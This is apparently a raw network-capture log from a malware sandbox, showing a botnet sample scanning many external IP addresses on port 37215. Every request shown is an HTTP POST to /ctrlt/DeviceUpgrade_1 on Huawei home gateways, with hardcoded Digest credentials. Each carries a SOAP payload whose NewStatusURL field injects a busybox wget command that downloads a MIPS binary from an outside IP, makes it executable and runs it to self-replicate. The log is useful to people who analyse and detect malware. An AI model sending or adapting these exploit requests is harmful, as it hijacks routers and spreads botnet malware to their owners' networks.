                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          163192.168.2.2334116157.28.220.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136807919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          164192.168.2.234802241.128.150.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136851072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          165192.168.2.2346132113.14.147.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136864901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          166192.168.2.234959851.109.240.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136873960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          167192.168.2.2341132197.154.0.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136908054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          168192.168.2.2347830197.122.224.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136925936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          169192.168.2.2357900157.174.146.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138011932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          170192.168.2.233427641.128.116.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138061047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          171192.168.2.2344416157.221.56.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138062954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          172192.168.2.2359900197.196.105.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138082981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          173192.168.2.235320241.238.192.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138101101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
